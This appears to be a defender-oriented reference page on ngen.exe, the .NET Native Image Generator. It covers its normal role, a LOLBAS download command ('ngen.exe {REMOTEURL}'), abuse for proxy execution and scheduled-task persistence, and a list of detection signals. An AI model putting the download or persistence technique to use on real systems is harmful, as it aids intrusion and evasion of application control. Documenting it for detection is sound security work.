Process

unknown

ngen.exe

ngen.exe is the .NET Native Image Generator, which precompiles .NET assemblies to native code for faster startup. It runs as part of .NET servicing. Attackers abuse the scheduled tasks and execution paths around it to run code through a signed Microsoft binary.

CategoryUtilityTagsmicrosoftcore-windowslolbin

File identity

File details

Not observed.

Signing information

Not observed.

File version0

Not observed.

File size0

Not observed.

Execution context

File paths0

Not observed.

User context0

Not observed.

Integrity level0

Not observed.

Instances0

Not observed.

Session0

Not observed.

Token privileges0

Not observed.

Ancestry

Parents0

Not observed.

Children0

Not observed.

Grandparents0

Not observed.

Grandchildren0

Not observed.

Behavior

Loaded modules0

Not observed.

Named pipes0

Not observed.

Process handles0

Not observed.

Command-line patterns0

Not observed.

LOLBAS1
  • ngen.exe {REMOTEURL}Download · It will download a remote payload and place it in INetCache.

View LOLBAS entry

Indicators

Hashes

Not observed.

Analysis

About this process

ngen.exe compiles managed assemblies into native images and maintains those images, work normally driven by .NET setup and by the ".NET Framework NGEN" scheduled tasks that run during idle time. It ships with the .NET Framework, so the genuine binary lives under C:\Windows\Microsoft.NET\Framework and Framework64, not System32.

Legitimately, ngen runs automatically after .NET updates and during maintenance windows, parented by the Task Scheduler. Interactive or oddly-parented invocations are what give an instance meaning.

Security notes

ngen.exe is a system-binary proxy and a persistence aid (T1218). Because it compiles and can trigger execution of .NET assemblies, it has been used to run attacker code under a trusted Microsoft binary, bypassing application-control rules that allow .NET tooling. The built-in NGEN scheduled tasks are also a persistence surface: pointing them at attacker code gives a SYSTEM-context execution that runs during normal maintenance.

Because ngen legitimately runs only as part of .NET servicing, an ngen invoked interactively, by an Office or script-host parent, or against an assembly in a user-writable path is what separates abuse from routine native-image generation.

Anomaly signals4
  • Image path outside the Microsoft.NET\Framework directorieshigh
  • Invoked to execute an assembly from a user-writable pathhigh
  • Parent is an Office application, a script host, cmd.exe, or powershell.exehigh
  • The NGEN scheduled tasks modified to point at attacker codehigh

Telemetry

OS prevalence0

Not observed.

Observation timeline

Not observed.

References

Subsearch

Hasbeen seen inof ngen.exe?
Edit this page on GitHub